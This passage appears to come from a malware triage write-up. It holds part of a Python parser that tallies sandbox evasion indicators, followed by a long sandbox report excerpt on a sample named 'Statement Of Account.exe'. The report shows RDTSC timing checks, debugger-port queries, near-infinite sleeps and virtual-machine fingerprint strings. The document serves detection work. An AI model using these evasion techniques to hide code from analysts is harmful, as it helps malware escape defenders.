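Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 14A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
"""

EVENTS = ("Process information set", "RDTSC instruction interceptor",
          "Memory allocated", "Thread delayed", "TID")
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<event>" + "|".join(EVENTS) + r"): "
    + r"(?P<rest>.*?)(?: Jump to behavior)?$")


def parse_line(line):
    """Return a dict describing one behaviour line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    source, event, rest = m.group("source", "event", "rest")
    rec = {"source": source, "image": source.rsplit("\\", 1)[-1], "event": event}
    if event == "Process information set":
        mode = sum(SEM_FLAGS.get(n.strip(), 0) for n in rest.split("|"))
        rec["error_mode"] = mode
        rec["crash_dialog_suppressed"] = bool(mode & SEM_FLAGS["NOGPFAULTERRORBOX"])
    elif event == "RDTSC instruction interceptor":
        a = re.search(r"First address: ([0-9A-F]+) second address: ([0-9A-F]+)", rest, re.I)
        gap = int(a.group(2), 16) - int(a.group(1), 16)
        rec["rdtsc_gap_bytes"] = gap       # 6 here: rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
        rec["timing_check"] = gap <= 16    # two reads this close measure a trap / VM exit
    elif event == "Memory allocated":
        rec["write_watch"] = "memory write watch" in rest   # MEM_WRITE_WATCH reserve
    elif event == "Thread delayed":
        ms = int(re.search(r"delay time: (\d+)", rest).group(1))
        rec["delay_ms"] = ms
        rec["effectively_infinite"] = ms >= INFINITE_SLEEP_MS
    else:  # "TID: n Thread sleep time: -Xs >= -30000s" (negative = relative wait)
        t = re.search(r"Thread sleep time: -(\d+)s", rest)
        if t and int(t.group(1)) % INFINITE_SLEEP_MS == 0:
            # Assumption: the total is the sum of the thread's maximal waits.
            rec["infinite_waits"] = int(t.group(1)) // INFINITE_SLEEP_MS
    return rec


def summarise(log_text):
    """Parse every line and tally the evasion indicators per image."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    per_image = Counter((r["image"], r["event"]) for r in records)
    indicators = {
        "crash_dialog_suppressed": sorted({r["image"] for r in records
                                           if r.get("crash_dialog_suppressed")}),
        "rdtsc_timing_checks": sum(1 for r in records if r.get("timing_check")),
        "write_watch_allocations": sum(1 for r in records if r.get("write_watch")),
        "infinite_sleeps": sum(1 for r in records if r.get("effectively_infinite")),
    }
    return records, per_image, indicators


if __name__ == "__main__":
    recs, per_image, ind = summarise(SAMPLE_LOG)
    for (image, event), n in sorted(per_image.items()):
        print(f"{image:<28} {event:<30} x{n}")
    print(ind)
```

Feed it the full report text instead of SAMPLE_LOG and the per-image counter collapses the hundreds of repeated SetErrorMode lines into one row per image while keeping the count, which is the figure a triage note actually needs; the indicator dictionary is what to compare against the runtime baseline (for a .NET sample, expect write-watch reservations regardless of maliciousness).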

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 27B9B7E second address: 27B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2C49B7E second address: 2C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 14A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 1710000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 7C40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 8C40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 8DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 9DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: A310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: B310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 4AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 7400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 6E00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 8400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 9400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 9820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: A820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: B820000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
Source: C:\Users\user\Desktop\Statement Of Account.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1059
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7517
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1888
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2015
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7921
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 862
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 472
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 9498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.2 %
Source: C:\Users\user\Desktop\Statement Of Account.exe TID: 6812 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep count: 8179 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504 Thread sleep count: 1059 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep count: 2015 > 30
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep time: -4030000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep count: 7921 > 30
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep time: -15842000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep count: 472 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep time: -944000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep count: 9498 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep time: -18996000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Statement Of Account.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.1714988461.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.2942465733.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000002.2946201505.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk, 8_2_00FB2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C0F0 mov eax, dword ptr fs:[00000030h] 8_2_00F6C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB20F0 mov ecx, dword ptr fs:[00000030h] 8_2_00FB20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h] 8_2_0101E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_00F6A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01030115 mov eax, dword ptr fs:[00000030h] 8_2_01030115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov ecx, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h] 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F780E9 mov eax, dword ptr fs:[00000030h] 8_2_00F780E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF60E0 mov eax, dword ptr fs:[00000030h] 8_2_00FF60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF20DE mov eax, dword ptr fs:[00000030h] 8_2_00FF20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov ecx, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01004144 mov eax, dword ptr fs:[00000030h] 8_2_01004144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F680A0 mov eax, dword ptr fs:[00000030h] 8_2_00F680A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01008158 mov eax, dword ptr fs:[00000030h] 8_2_01008158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044164 mov eax, dword ptr fs:[00000030h] 8_2_01044164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044164 mov eax, dword ptr fs:[00000030h] 8_2_01044164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7208A mov eax, dword ptr fs:[00000030h] 8_2_00F7208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014180 mov eax, dword ptr fs:[00000030h] 8_2_01014180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01014180 mov eax, dword ptr fs:[00000030h] 8_2_01014180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h] 8_2_0102C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h] 8_2_0102C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9C073 mov eax, dword ptr fs:[00000030h] 8_2_00F9C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72050 mov eax, dword ptr fs:[00000030h] 8_2_00F72050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6050 mov eax, dword ptr fs:[00000030h] 8_2_00FF6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h] 8_2_010361C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h] 8_2_010361C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A020 mov eax, dword ptr fs:[00000030h] 8_2_00F6A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C020 mov eax, dword ptr fs:[00000030h] 8_2_00F6C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010461E5 mov eax, dword ptr fs:[00000030h] 8_2_010461E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h] 8_2_00F8E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4000 mov ecx, dword ptr fs:[00000030h] 8_2_00FF4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 mov eax, dword ptr fs:[00000030h] 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA01F8 mov eax, dword ptr fs:[00000030h] 8_2_00FA01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h] 8_2_00F861D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h] 8_2_00F861D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h] 8_2_00FEE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006030 mov eax, dword ptr fs:[00000030h] 8_2_01006030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h] 8_2_00FF019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h] 8_2_00F6A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB0185 mov eax, dword ptr fs:[00000030h] 8_2_00FB0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C156 mov eax, dword ptr fs:[00000030h] 8_2_00F6C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h] 8_2_00F76154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h] 8_2_00F76154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010080A8 mov eax, dword ptr fs:[00000030h] 8_2_010080A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72140 mov ecx, dword ptr fs:[00000030h] 8_2_00F72140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72140 mov eax, dword ptr fs:[00000030h] 8_2_00F72140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010360B8 mov eax, dword ptr fs:[00000030h] 8_2_010360B8
